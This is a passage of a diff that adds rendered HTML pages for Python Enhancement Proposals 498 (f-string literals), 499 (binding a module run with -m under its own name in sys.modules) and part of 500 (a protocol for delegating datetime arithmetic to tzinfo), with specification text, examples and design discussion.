+'error: disk failure'
+
+
+

But if msg were ever to be a tuple, the same code would fail:

+
>>> msg = ('disk failure', 32)
+>>> 'error: %s' % msg
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: not all arguments converted during string formatting
+
+
+

To be defensive, the following code should be used:

+
>>> 'error: %s' % (msg,)
+"error: ('disk failure', 32)"
+
+
+

str.format() was added to address some of these problems with +%-formatting. In particular, it uses normal function call syntax (and +therefore supports multiple parameters) and it is extensible through +the __format__() method on the object being converted to a +string. See PEP 3101 for a detailed rationale. This PEP reuses much of +the str.format() syntax and machinery, in order to provide +continuity with an existing Python string formatting mechanism.

+

However, str.format() is not without its issues. Chief among them +is its verbosity. For example, the text value is repeated here:

+
>>> value = 4 * 20
+>>> 'The value is {value}.'.format(value=value)
+'The value is 80.'
+
+
+

Even in its simplest form there is a bit of boilerplate, and the value +that’s inserted into the placeholder is sometimes far removed from +where the placeholder is situated:

+
>>> 'The value is {}.'.format(value)
+'The value is 80.'
+
+
+

With an f-string, this becomes:

+
>>> f'The value is {value}.'
+'The value is 80.'
+
+
+

F-strings provide a concise, readable way to include the value of +Python expressions inside strings.

+

In this sense, string.Template and %-formatting have similar +shortcomings to str.format(), but also support fewer formatting +options. In particular, they do not support the __format__ +protocol, so that there is no way to control how a specific object is +converted to a string, nor can it be extended to additional types that +want to control how they are converted to strings (such as Decimal +and datetime). This example is not possible with +string.Template:

+
>>> value = 1234
+>>> f'input={value:#06x}'
+'input=0x04d2'
+
+
+

And neither %-formatting nor string.Template can control +formatting such as:

+
>>> date = datetime.date(1991, 10, 12)
+>>> f'{date} was on a {date:%A}'
+'1991-10-12 was on a Saturday'
+
+
+
+

No use of globals() or locals()

+

In the discussions on python-dev [4], a number of solutions were +presented that used locals() and globals() or their equivalents. All +of these have various problems. Among these are referencing variables +that are not otherwise used in a closure. Consider:

+
>>> def outer(x):
+...     def inner():
+...         return 'x={x}'.format_map(locals())
+...     return inner
+...
+>>> outer(42)()
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+  File "<stdin>", line 3, in inner
+KeyError: 'x'
+
+
+

This returns an error because the compiler has not added a reference +to x inside the closure. You need to manually add a reference to x in +order for this to work:

+
>>> def outer(x):
+...     def inner():
+...         x
+...         return 'x={x}'.format_map(locals())
+...     return inner
+...
+>>> outer(42)()
+'x=42'
+
+
+

In addition, using locals() or globals() introduces an information +leak. A called routine that has access to the caller’s locals() or +globals() has access to far more information than needed to do the +string interpolation.

+

Guido stated [5] that any solution to better string interpolation +would not use locals() or globals() in its implementation. (This does +not forbid users from passing locals() or globals() in, it just +doesn’t require it, nor does it allow using these functions under the +hood.)

+
+
+
+

Specification

+

In source code, f-strings are string literals that are prefixed by the +letter ‘f’ or ‘F’. Everywhere this PEP uses ‘f’, ‘F’ may also be +used. ‘f’ may be combined with ‘r’ or ‘R’, in either order, to produce +raw f-string literals. ‘f’ may not be combined with ‘b’: this PEP does +not propose to add binary f-strings. ‘f’ may not be combined with ‘u’.

+

When tokenizing source files, f-strings use the same rules as normal +strings, raw strings, binary strings, and triple quoted strings. That +is, the string must end with the same character that it started with: +if it starts with a single quote it must end with a single quote, etc. +This implies that any code that currently scans Python code looking +for strings should be trivially modifiable to recognize f-strings +(parsing within an f-string is another matter, of course).

+

Once tokenized, f-strings are parsed into literal strings and +expressions. Expressions appear within curly braces '{' and +'}'. While scanning the string for expressions, any doubled +braces '{{' or '}}' inside literal portions of an f-string are +replaced by the corresponding single brace. Doubled literal opening +braces do not signify the start of an expression. A single closing +curly brace '}' in the literal portion of a string is an error: +literal closing curly braces must be doubled '}}' in order to +represent a single closing brace.

+

The parts of the f-string outside of braces are literal +strings. These literal portions are then decoded. For non-raw +f-strings, this includes converting backslash escapes such as +'\n', '\"', "\'", '\xhh', '\uxxxx', +'\Uxxxxxxxx', and named unicode characters '\N{name}' into +their associated Unicode characters [6].

+

Backslashes may not appear anywhere within expressions. Comments, +using the '#' character, are not allowed inside an expression.

+

Following each expression, an optional type conversion may be +specified. The allowed conversions are '!s', '!r', or +'!a'. These are treated the same as in str.format(): '!s' +calls str() on the expression, '!r' calls repr() on the +expression, and '!a' calls ascii() on the expression. These +conversions are applied before the call to format(). The only +reason to use '!s' is if you want to specify a format specifier +that applies to str, not to the type of the expression.
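
+
For instance, a conversion can be combined with a format specifier; the conversion is applied first, and the specifier then formats the resulting string (an illustrative example, not from the original text):

+
>>> name = 'Fred'
+>>> f'{name!r:>10}'
+"    'Fred'"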

+

F-strings use the same format specifier mini-language as str.format. +Similar to str.format(), optional format specifiers may be +included inside the f-string, separated from the expression (or the +type conversion, if specified) by a colon. If a format specifier is +not provided, an empty string is used.

+

So, an f-string looks like:

+
f ' <text> { <expression> <optional !s, !r, or !a> <optional : format specifier> } <text> ... '
+
+
+

The expression is then formatted using the __format__ protocol, +using the format specifier as an argument. The resulting value is +used when building the value of the f-string.

+

Note that __format__() is not called directly on each value. The +actual code uses the equivalent of type(value).__format__(value, +format_spec), or format(value, format_spec). See the +documentation of the builtin format() function for more details.
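
+
In other words, the following two expressions should produce the same result (illustrative):

+
>>> value = 3.14159
+>>> format(value, '.2f')
+'3.14'
+>>> f'{value:.2f}'
+'3.14'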

+

Expressions cannot contain ':' or '!' outside of strings or +parentheses, brackets, or braces. The exception is that the '!=' +operator is allowed as a special case.
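
+
For example (illustrative):

+
>>> f'{1 != 2}'
+'True'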

+
+

Escape sequences

+

Backslashes may not appear inside the expression portions of +f-strings, so you cannot use them, for example, to escape quotes +inside f-strings:

+
>>> f'{\'quoted string\'}'
+  File "<stdin>", line 1
+SyntaxError: f-string expression part cannot include a backslash
+
+
+

You can use a different type of quote inside the expression:

+
>>> f'{"quoted string"}'
+'quoted string'
+
+
+

Backslash escapes may appear inside the string portions of an +f-string.

+

Note that the correct way to have a literal brace appear in the +resulting string value is to double the brace:

+
>>> f'{{ {4*10} }}'
+'{ 40 }'
+>>> f'{{{4*10}}}'
+'{40}'
+
+
+

Like all raw strings in Python, no escape processing is done for raw +f-strings:

+
>>> fr'x={4*10}\n'
+'x=40\\n'
+
+
+

Due to Python’s string tokenizing rules, the f-string +f'abc {a['x']} def' is invalid. The tokenizer parses this as 3 +tokens: f'abc {a[', x, and ']} def'. Just like regular +strings, this cannot be fixed by using raw strings. There are a number +of correct ways to write this f-string: with a different quote +character:

+
f"abc {a['x']} def"
+
+
+

Or with triple quotes:

+
f'''abc {a['x']} def'''
+
+
+
+
+

Code equivalence

+

The exact code used to implement f-strings is not specified. However, +it is guaranteed that any embedded value that is converted to a string +will use that value’s __format__ method. This is the same +mechanism that str.format() uses to convert values to strings.

+

For example, this code:

+
f'abc{expr1:spec1}{expr2!r:spec2}def{expr3}ghi'
+
+
+

Might be evaluated as:

+
'abc' + format(expr1, spec1) + format(repr(expr2), spec2) + 'def' + format(expr3) + 'ghi'
+
+
+
+
+

Expression evaluation

+

The expressions that are extracted from the string are evaluated in +the context where the f-string appeared. This means the expression has +full access to local and global variables. Any valid Python expression +can be used, including function and method calls.

+

Because the f-strings are evaluated where the string appears in the +source code, there is no additional expressiveness available with +f-strings. There are also no additional security concerns: you could +have also just written the same expression, not inside of an +f-string:

+
>>> def foo():
+...   return 20
+...
+>>> f'result={foo()}'
+'result=20'
+
+
+

Is equivalent to:

+
>>> 'result=' + str(foo())
+'result=20'
+
+
+

Expressions are parsed with the equivalent of ast.parse('(' + +expression + ')', '<fstring>', 'eval') [7].

+

Note that since the expression is enclosed by implicit parentheses +before evaluation, expressions can contain newlines. For example:

+
>>> x = 0
+>>> f'''{x
+... +1}'''
+'1'
+
+>>> d = {0: 'zero'}
+>>> f'''{d[0
+... ]}'''
+'zero'
+
+
+
+
+

Format specifiers

+

Format specifiers may also contain evaluated expressions. This allows +code such as:

+
>>> width = 10
+>>> precision = 4
+>>> value = decimal.Decimal('12.34567')
+>>> f'result: {value:{width}.{precision}}'
+'result:      12.35'
+
+
+

Once expressions in a format specifier are evaluated (if necessary), +format specifiers are not interpreted by the f-string evaluator. Just +as in str.format(), they are merely passed in to the +__format__() method of the object being formatted.

+
+
+

Concatenating strings

+

Adjacent f-strings and regular strings are concatenated. Regular +strings are concatenated at compile time, and f-strings are +concatenated at run time. For example, the expression:

+
>>> x = 10
+>>> y = 'hi'
+>>> 'a' 'b' f'{x}' '{c}' f'str<{y:^4}>' 'd' 'e'
+
+
+

yields the value:

+
'ab10{c}str< hi >de'
+
+
+

While the exact method of this run time concatenation is unspecified, +the above code might evaluate to:

+
'ab' + format(x) + '{c}' + 'str<' + format(y, '^4') + '>de'
+
+
+

Each f-string is entirely evaluated before being concatenated to +adjacent f-strings. That means that this:

+
>>> f'{x' f'}'
+
+
+

Is a syntax error, because the first f-string does not contain a +closing brace.

+
+
+

Error handling

+

Either compile time or run time errors can occur when processing +f-strings. Compile time errors are limited to those errors that can be +detected when scanning an f-string. These errors all raise +SyntaxError.

+

Unmatched braces:

+
>>> f'x={x'
+  File "<stdin>", line 1
+SyntaxError: f-string: expecting '}'
+
+
+

Invalid expressions:

+
>>> f'x={!x}'
+  File "<stdin>", line 1
+SyntaxError: f-string: empty expression not allowed
+
+
+

Run time errors occur when evaluating the expressions inside an +f-string. Note that an f-string can be evaluated multiple times, and +work sometimes and raise an error at other times:

+
>>> d = {0:10, 1:20}
+>>> for i in range(3):
+...     print(f'{i}:{d[i]}')
+...
+0:10
+1:20
+Traceback (most recent call last):
+  File "<stdin>", line 2, in <module>
+KeyError: 2
+
+
+

or:

+
>>> for x in (32, 100, 'fifty'):
+...   print(f'x = {x:+3}')
+...
x = +32
+x = +100
+Traceback (most recent call last):
+  File "<stdin>", line 2, in <module>
+ValueError: Sign not allowed in string format specifier
+
+
+
+
+

Leading and trailing whitespace in expressions is ignored

+

For ease of readability, leading and trailing whitespace in +expressions is ignored. This is a by-product of enclosing the +expression in parentheses before evaluation.
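
+
For example (illustrative):

+
>>> x = 42
+>>> f'{ x }'
+'42'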

+
+
+

Evaluation order of expressions

+

The expressions in an f-string are evaluated in left-to-right +order. This is detectable only if the expressions have side effects:

+
>>> def fn(l, incr):
+...    result = l[0]
+...    l[0] += incr
+...    return result
+...
+>>> lst = [0]
+>>> f'{fn(lst,2)} {fn(lst,3)}'
+'0 2'
+>>> f'{fn(lst,2)} {fn(lst,3)}'
+'5 7'
+>>> lst
+[10]
+
+
+
+
+
+

Discussion

+
+

python-ideas discussion

+

Most of the discussions on python-ideas [8] focused on three issues:

+
    +
  • How to denote f-strings,
  • +
  • How to specify the location of expressions in f-strings, and
  • +
  • Whether to allow full Python expressions.
  • +
+
+

How to denote f-strings

+

Because the compiler must be involved in evaluating the expressions +contained in the interpolated strings, there must be some way to +denote to the compiler which strings should be evaluated. This PEP +chose a leading 'f' character preceding the string literal. This +is similar to how 'b' and 'r' prefixes change the meaning of +the string itself, at compile time. Other prefixes were suggested, +such as 'i'. No option seemed better than the other, so 'f' +was chosen.

+

Another option was to support special functions, known to the +compiler, such as Format(). This seems like too much magic for +Python: not only is there a chance for collision with existing +identifiers, the PEP author feels that it’s better to signify the +magic with a string prefix character.

+
+
+

How to specify the location of expressions in f-strings

+

This PEP supports the same syntax as str.format() for +distinguishing replacement text inside strings: expressions are +contained inside braces. There were other options suggested, such as +string.Template’s $identifier or ${expression}.

+

While $identifier is no doubt more familiar to shell scripters and +users of some other languages, in Python str.format() is heavily +used. A quick search of Python’s standard library shows only a handful +of uses of string.Template, but hundreds of uses of +str.format().

+

Another proposed alternative was to have the substituted text between +\{ and } or between \{ and \}. While this syntax would +probably be desirable if all string literals were to support +interpolation, this PEP only supports strings that are already marked +with the leading 'f'. As such, the PEP is using unadorned braces +to denote substituted text, in order to leverage end user familiarity +with str.format().

+
+
+

Supporting full Python expressions

+

Many people on the python-ideas discussion wanted support for either +only single identifiers, or a limited subset of Python expressions +(such as the subset supported by str.format()). This PEP supports +full Python expressions inside the braces. Without full expressions, +some desirable usage would be cumbersome. For example:

+
>>> f'Column={col_idx+1}'
+>>> f'number of items: {len(items)}'
+
+
+

would become:

+
>>> col_number = col_idx+1
+>>> f'Column={col_number}'
+>>> n_items = len(items)
+>>> f'number of items: {n_items}'
+
+
+

While it’s true that very ugly expressions could be included in the +f-strings, this PEP takes the position that such uses should be +addressed in a linter or code review:

+
>>> f'mapping is { {a:b for (a, b) in ((1, 2), (3, 4))} }'
+'mapping is {1: 2, 3: 4}'
+
+
+
+
+
+

Similar support in other languages

+

Wikipedia has a good discussion of string interpolation in other +programming languages [9]. This feature is implemented in many +languages, with a variety of syntaxes and restrictions.

+
+
+

Differences between f-string and str.format expressions

+

There is one small difference between the limited expressions allowed +in str.format() and the full expressions allowed inside +f-strings. The difference is in how index lookups are performed. In +str.format(), index values that do not look like numbers are +converted to strings:

+
>>> d = {'a': 10, 'b': 20}
+>>> 'a={d[a]}'.format(d=d)
+'a=10'
+
+
+

Notice that the index value is converted to the string 'a' when it +is looked up in the dict.

+

However, in f-strings, you would need to use a literal for the value +of 'a':

+
>>> f'a={d["a"]}'
+'a=10'
+
+
+

This difference is required because otherwise you would not be able to +use variables as index values:

+
>>> a = 'b'
+>>> f'a={d[a]}'
+'a=20'
+
+
+

See [10] for a further discussion. It was this observation that led to +full Python expressions being supported in f-strings.

+

Furthermore, the limited expressions that str.format() understands +need not be valid Python expressions. For example:

+
>>> '{i[";]}'.format(i={'";':4})
+'4'
+
+
+

For this reason, the str.format() “expression parser” is not suitable +for use when implementing f-strings.

+
+
+

Triple-quoted f-strings

+

Triple quoted f-strings are allowed. These strings are parsed just as +normal triple-quoted strings are. After parsing and decoding, the +normal f-string logic is applied, and __format__() is called on +each value.
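
+
For example, a triple-quoted f-string can span multiple lines (illustrative):

+
>>> name = 'Fred'
+>>> f'''He said his
+... name is {name}.'''
+'He said his\nname is Fred.'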

+
+
+

Raw f-strings

+

Raw and f-strings may be combined. For example, they could be used to +build up regular expressions:

+
>>> header = 'Subject'
+>>> fr'{header}:\s+'
+'Subject:\\s+'
+
+
+

In addition, raw f-strings may be combined with triple-quoted strings.

+
+
+

No binary f-strings

+

For the same reason that we don’t support bytes.format(), you may +not combine 'f' with 'b' string literals. The primary problem +is that an object’s __format__() method may return Unicode data that +is not compatible with a bytes string.

+

Binary f-strings would first require a solution for +bytes.format(). This idea has been proposed in the past, most +recently in PEP 461. The discussions of such a feature usually +suggest either

+
    +
  • adding a method such as __bformat__() so an object can control +how it is converted to bytes, or
  • +
  • having bytes.format() not be as general purpose or extensible +as str.format().
  • +
+

Both of these remain as options in the future, if such functionality +is desired.

+
+
+

!s, !r, and !a are redundant

+

The !s, !r, and !a conversions are not strictly +required. Because arbitrary expressions are allowed inside the +f-strings, this code:

+
>>> a = 'some string'
+>>> f'{a!r}'
+"'some string'"
+
+
+

Is identical to:

+
>>> f'{repr(a)}'
+"'some string'"
+
+
+

Similarly, !s can be replaced by calls to str() and !a by +calls to ascii().

+

However, !s, !r, and !a are supported by this PEP in order +to minimize the differences with str.format(). !s, !r, and +!a are required in str.format() because it does not allow the +execution of arbitrary expressions.

+
+
+

Lambdas inside expressions

+

Because lambdas use the ':' character, they cannot appear outside +of parentheses in an expression. The colon is interpreted as the start +of the format specifier, which means the start of the lambda +expression is seen and is syntactically invalid. As there’s no +practical use for a plain lambda in an f-string expression, this is +not seen as much of a limitation.

+

If you feel you must use lambdas, they may be used inside of parentheses:

+
>>> f'{(lambda x: x*2)(3)}'
+'6'
+
+
+
+
+

Can’t combine with ‘u’

+

The ‘u’ prefix was added to Python 3.3 in PEP 414 as a means to ease +source compatibility with Python 2.7. Because Python 2.7 will never +support f-strings, there is nothing to be gained by being able to +combine the ‘f’ prefix with ‘u’.

+
+
+
+

Examples from Python’s source code

+

Here are some examples from Python source code that currently use +str.format(), and how they would look with f-strings. This PEP +does not recommend wholesale converting to f-strings, these are just +examples of real-world usages of str.format() and how they’d look +if written from scratch using f-strings.

+

Lib/asyncio/locks.py:

+
extra = '{},waiters:{}'.format(extra, len(self._waiters))
+extra = f'{extra},waiters:{len(self._waiters)}'
+
+
+

Lib/configparser.py:

+
message.append(" [line {0:2d}]".format(lineno))
+message.append(f" [line {lineno:2d}]")
+
+
+

Tools/clinic/clinic.py:

+
methoddef_name = "{}_METHODDEF".format(c_basename.upper())
+methoddef_name = f"{c_basename.upper()}_METHODDEF"
+
+
+

python-config.py:

+
print("Usage: {0} [{1}]".format(sys.argv[0], '|'.join('--'+opt for opt in valid_opts)), file=sys.stderr)
+print(f"Usage: {sys.argv[0]} [{'|'.join('--'+opt for opt in valid_opts)}]", file=sys.stderr)
+
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0498.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0499/index.html b/pep-0499/index.html new file mode 100644 index 00000000000..112f7e936ed --- /dev/null +++ b/pep-0499/index.html @@ -0,0 +1,343 @@ + + + + + + + + PEP 499 – python -m foo should also bind 'foo' in sys.modules | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 499 – python -m foo should also bind 'foo' in sys.modules

+
+
Author:
+
Cameron Simpson <cs at cskk.id.au>, Chris Angelico <rosuav at gmail.com>, Joseph Jevnik <joejev at gmail.com>
+
BDFL-Delegate:
+
Alyssa Coghlan
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
07-Aug-2015
+
Python-Version:
+
3.10
+
+
+
+
Table of Contents +
+
+

PEP Deferral

+

The implementation of this PEP isn’t currently expected to be ready for the +Python 3.9 feature freeze in April 2020, so it has been deferred 12 months to +Python 3.10.

+
+
+

Abstract

+

When a module is used as a main program on the Python command line, +such as by:

+
+
python -m module.name …
+

it is easy to accidentally end up with two independent instances +of the module if that module is again imported within the program. +This PEP proposes a way to fix this problem.

+

When a module is invoked via Python’s -m option the module is bound +to sys.modules['__main__'] and its .__name__ attribute is set to +'__main__'. +This enables the standard “main program” boilerplate code at the +bottom of many modules, such as:

+
if __name__ == '__main__':
+    sys.exit(main(sys.argv))
+
+
+

However, when the above command line invocation is used it is a +natural inference to presume that the module is actually imported +under its official name module.name, +and therefore that if the program again imports that name +then it will obtain the same module instance.

+

The actuality is that the module was imported only as '__main__'. +Another import will obtain a distinct module instance, which can +lead to confusing bugs, +all stemming from having two instances of module global objects: +one in each module.
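
+
A minimal demonstration of the problem (the module name mymod is hypothetical; run as python -m mymod with mymod.py on the path):

+
# mymod.py
+cache = {}
+
+if __name__ == '__main__':
+    import mymod                   # obtains a *second* module instance
+    print(mymod.cache is cache)    # prints False under the status quo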

+

Examples include:

+
+
module level data structures
Some modules provide features such as caches or registries +as module-level global variables, +typically private. +A second instance of a module creates a second data structure. +If that structure is a cache, +such as in the re module, +then two caches exist, leading to wasteful memory use. +If that structure is a shared registry, +such as a mapping of values to handlers, +then it is possible to register a handler with one registry +and to try to use it via the other registry, where it is unknown.
+
sentinels
The standard test for a sentinel value provided by a module +is the identity comparison using is, +as this avoids unreliable “looks like” comparisons +such as equality which can both mismatch two values as “equal” +(for example being zeroish) +or raise a TypeError when the objects are incompatible. +When there are two instances of a module +there are two sentinel instances +and only one will be recognised via is.
+
classes
With two modules +there are duplicate class definitions of any classes provided. +All operations which depend on recognising these classes +and subclasses of these are prone to failure +depending where the reference class +(from one of the modules) is obtained +and where the comparison class or instance is obtained. +This impacts isinstance, issubclass +and also try/except constructs.
+
+
+
+

Proposal

+

It is suggested that to fix this situation all that is needed is a +simple change to the way the -m option is implemented: in addition +to binding the module object to sys.modules['__main__'], it is also +bound to sys.modules['module.name'].

+

Alyssa (Nick) Coghlan has suggested that this is as simple as modifying the +runpy module’s _run_module_as_main function as follows:

+
main_globals = sys.modules["__main__"].__dict__
+
+
+

to instead be:

+
main_module = sys.modules["__main__"]
+sys.modules[mod_spec.name] = main_module
+main_globals = main_module.__dict__
+
+
+

Joseph Jevnik has pointed out that modules which are packages already +do something very similar to this proposal: +the __init__.py file is bound to the module’s canonical name +and the __main__.py file is bound to “__main__”. +As such, the double import issue does not occur. +Therefore, this PEP proposes to affect only simple non-package modules.

+
+
+

Considerations and Prerequisites

+
+

Pickling Modules

+

Alyssa has mentioned issue 19702 which proposes (quoted from the issue):

+
    +
  • runpy will ensure that when __main__ is executed via the import +system, it will also be aliased in sys.modules as __spec__.name
  • +
  • if __main__.__spec__ is set, pickle will use __spec__.name rather +than __name__ to pickle classes, functions and methods defined in +__main__
  • +
  • multiprocessing is updated appropriately to skip creating __mp_main__ +in child processes when __main__.__spec__ is set in the parent +process
  • +
+

The first point above covers this PEP’s specific proposal.

+
+
+

A Normal Module’s __name__ Is No Longer Canonical

+

Chris Angelico points out that it becomes possible to import a +module whose __name__ is not what you gave to “import”, since +“__main__” is now present at “module.name”, so a subsequent +import module.name finds it already present. +Therefore, __name__ is no longer the canonical name for some normal imports.

+

Some counter arguments follow:

+
    +
  • As of PEP 451 a module’s canonical name is stored at __spec__.name.
  • +
  • Very little code should actually care about __name__ being the canonical name +and any that does should arguably be updated to consult __spec__.name +with fallback to __name__ for older Pythons, should that be relevant +(a sketch of such a lookup follows this list). +This is true even if this PEP is not approved.
  • +
  • Should this PEP be approved, +it becomes possible to introspect a module by its canonical name +and ask “was this the main program?” by inferring from __name__. +This was not previously possible.
  • +
+

The glaring counter example is the standard “am I the main program?” boilerplate, +where __name__ is expected to be “__main__”. +This PEP explicitly preserves that semantic.
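For reference, the preserved boilerplate, together with a sketch of the __spec__.name lookup suggested in the counterarguments above (canonical_name is a hypothetical helper):

# The "am I the main program?" idiom this PEP preserves
# (main() is the application's entry point, shown for illustration):
if __name__ == "__main__":
    main()

# Consulting the canonical name, with a fallback for older Pythons:
def canonical_name(module):
    spec = getattr(module, "__spec__", None)
    return spec.name if spec is not None else module.__name__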

+
+
+
+

Reference Implementation

+

BPO 36375 is the issue tracker entry +for the PEP’s reference implementation, with the current draft PR being +available on GitHub.

+
+
+

Open Questions

+

This proposal does raise some backwards compatibility concerns, and these will +need to be well understood, and either a deprecation process designed, or clear +porting guidelines provided.

+
+

Pickle compatibility

+

If no changes are made to the pickle module, then pickles that were previously +being written with the correct module name (due to a dual import) may start +being written with __main__ as their module name instead, and hence fail +to be loaded correctly by other projects.

+

Scenarios to be checked:

+
    +
  • python script.py writing, python -m script reading
  • +
  • python -m script writing, python script.py reading
  • +
  • python -m script writing, python some_other_app.py reading
  • +
  • old_python -m script writing, new_python -m script reading
  • +
  • new_python -m script writing, old_python -m script reading
  • +
+
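To make the risk concrete, a minimal sketch (the file name script.py and class Point are hypothetical) of how the pickled module name is determined:

# script.py
import pickle

class Point:
    pass

if __name__ == "__main__":
    payload = pickle.dumps(Point())
    # Run as "python script.py" today, Point pickles as "__main__.Point".
    # Under this PEP, "python -m script" could instead record "script.Point"
    # (per the issue 19702 changes), affecting the reader scenarios above.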
+
+

Projects that special-case __main__

+

In order to get the regression test suite to pass, the current reference +implementation had to patch pdb to avoid destroying its own global +namespace.

+

This suggests there may be a broader compatibility issue where some scripts are relying on direct execution and import giving different namespaces (just as package execution keeps the two separate by executing the __main__ submodule in the __main__ namespace, while the package name references the __init__ file as usual).

+
+
+
+

Background

+

I tripped over this issue while debugging a main program via a module that tried to monkey-patch a named module, that module being the main program module. Naturally, the monkey-patching was ineffective, as it imported the main module by name and thus patched the second module instance, not the running module instance.

+

However, the problem has been around as long as the -m command +line option and is encountered regularly, if infrequently, by others.

+

In addition to issue 19702, the discrepancy around __main__ +is alluded to in PEP 451 and a similar proposal (predating PEP 451) +is described in PEP 395 under +Fixing dual imports of the main module.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0499.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0500/index.html b/pep-0500/index.html new file mode 100644 index 00000000000..4ba2a2fa9a6 --- /dev/null +++ b/pep-0500/index.html @@ -0,0 +1,331 @@ + PEP 500 – A protocol for delegating datetime methods to their tzinfo implementations | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 500 – A protocol for delegating datetime methods to their tzinfo implementations

+
+
Author:
+
Alexander Belopolsky <alexander.belopolsky at gmail.com>, Tim Peters <tim.peters at gmail.com>
+
Discussions-To:
+
Datetime-SIG list
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Requires:
+
495
+
Created:
+
08-Aug-2015
+
Resolution:
+
Datetime-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP specifies a new protocol (PDDM - “A Protocol for Delegating Datetime Methods”) that can be used by concrete implementations of the datetime.tzinfo interface to override aware datetime arithmetic, formatting and parsing. We describe changes to the datetime.datetime class to support the new protocol and propose a new abstract class datetime.tzstrict that implements the parts of this protocol necessary to make aware datetime instances follow “strict” arithmetic rules.

+
+
+

Rationale

+

As of Python 3.5, aware datetime instances that share a tzinfo object follow the rules of arithmetic that are induced by a simple bijection between (year, month, day, hour, minute, second, microsecond) 7-tuples and large integers. In this arithmetic, the difference between YEAR-11-02T12:00 and YEAR-11-01T12:00 is always 24 hours, even though in the US/Eastern timezone, for example, there are 25 hours between 2014-11-01T12:00 and 2014-11-02T12:00, because the local clocks were rolled back one hour at 2014-11-02T02:00, introducing an extra hour in the night between 2014-11-01 and 2014-11-02.
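To see the two arithmetics side by side, here is a short demonstration using the zoneinfo module (which postdates this PEP and is used purely for illustration):

from datetime import datetime, timezone
from zoneinfo import ZoneInfo  # Python 3.9+, illustration only

tz = ZoneInfo("America/New_York")
d1 = datetime(2014, 11, 1, 12, tzinfo=tz)
d2 = datetime(2014, 11, 2, 12, tzinfo=tz)

# Same-zone subtraction follows the naive 24-hours-per-day bijection:
print(d2 - d1)  # 1 day, 0:00:00
# Converting to UTC first reveals the 25 elapsed hours across the DST fold:
print(d2.astimezone(timezone.utc) - d1.astimezone(timezone.utc))  # 1 day, 1:00:00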

+

Many business applications require the use of Python’s simplified view +of local dates. No self-respecting car rental company will charge its +customers more for a week that straddles the end of DST than for any +other week or require that they return the car an hour early. +Therefore, changing the current rules for aware datetime arithmetics +will not only create a backward compatibility nightmare, it will +eliminate support for legitimate and common use cases.

+

Since it is impossible to choose universal rules for local time arithmetic, we propose to delegate the implementation of those rules to the classes that implement the datetime.tzinfo interface. With such delegation in place, users will be able to choose between different arithmetics by simply picking instances of different classes for the value of tzinfo.

+
+
+

Protocol

+
+

Subtraction of datetime

+

A tzinfo subclass supporting the PDDM may define a method called __datetime_diff__ that should take two datetime.datetime instances and return a datetime.timedelta instance representing the time elapsed from the time represented by the first datetime instance to that represented by the second.

+
+
+

Addition

+

A tzinfo subclass supporting the PDDM may define a method called __datetime_add__ that should take two arguments, a datetime and a timedelta instance, and return a datetime instance.

+
+
+

Subtraction of timedelta

+

A tzinfo subclass supporting the PDDM may define a method called __datetime_sub__ that should take two arguments, a datetime and a timedelta instance, and return a datetime instance.

+
+
+

Formatting

+

A tzinfo subclass supporting the PDDM may define methods called __datetime_isoformat__ and __datetime_strftime__.

+

The __datetime_isoformat__ method should take a datetime instance +and an optional separator and produce a string representation of the +given datetime instance.

+

The __datetime_strftime__ method should take a datetime instance +and a format string and produce a string representation of the given +datetime instance formatted according to the given format.

+
+
+

Parsing

+

A tzinfo subclass supporting the PDDM may define a class method called __datetime_strptime__ and register the “canonical” names of the timezones that it implements with a registry. TODO Describe a registry.

+
+
+
+

Changes to datetime methods

+
+

Subtraction

+
class datetime:
+    def __sub__(self, other):
+        if isinstance(other, datetime):
+            try:
+                self_diff = self.tzinfo.__datetime_diff__
+            except AttributeError:
+                self_diff = None
+            try:
+                other_diff = other.tzinfo.__datetime_diff__
+            except AttributeError:
+                other_diff = None
+            if self_diff is not None:
+                if other_diff is None or (self_diff is not other_diff
+                        and self_diff.__func__ is not other_diff.__func__):
+                    raise ValueError("Cannot find difference of two datetimes with "
+                                     "different tzinfo.__datetime_diff__ implementations.")
+                # Protocol order: __datetime_diff__(dt1, dt2) returns the time
+                # elapsed from dt1 to dt2, so self - other is diff(other, self)
+                return self_diff(other, self)
+        elif isinstance(other, timedelta):
+            try:
+                sub = self.tzinfo.__datetime_sub__
+            except AttributeError:
+                pass
+            else:
+                return sub(self, other)
+            return self + -other
+        else:
+            return NotImplemented
+        # current implementation
+
+
+
+
+

Addition

+

Addition of a timedelta to a datetime instance will be delegated to the +self.tzinfo.__datetime_add__ method whenever it is defined.
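For symmetry with the __sub__ pseudocode above, a minimal sketch (illustrative, not taken from the PEP text) of what that delegation could look like:

class datetime:
    def __add__(self, other):
        if isinstance(other, timedelta):
            try:
                add = self.tzinfo.__datetime_add__
            except AttributeError:
                pass  # tzinfo missing or lacks PDDM support
            else:
                return add(self, other)
        # otherwise fall through to the current implementation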

+
+
+
+

Strict arithmetics

+

A new abstract subclass of datetime.tzinfo class called datetime.tzstrict +will be added to the datetime module. This subclass will not implement the +utcoffset(), tzname() or dst() methods, but will implement some of the +methods of the PDDM.

+

The PDDM methods implemented by tzstrict will be equivalent to the following:

+
class tzstrict(tzinfo):
+    def __datetime_diff__(self, dt1, dt2):
+        utc_dt1 = dt1.astimezone(timezone.utc)
+        utc_dt2 = dt2.astimezone(timezone.utc)
+        return utc_dt2 - utc_dt1
+
+    def __datetime_add__(self, dt, delta):
+        utc_dt = dt.astimezone(timezone.utc)
+        return (utc_dt + delta).astimezone(self)
+
+    def __datetime_sub__(self, dt, delta):
+        utc_dt = dt.astimezone(timezone.utc)
+        return (utc_dt - delta).astimezone(self)
+
+
+
+

Parsing and formatting

+

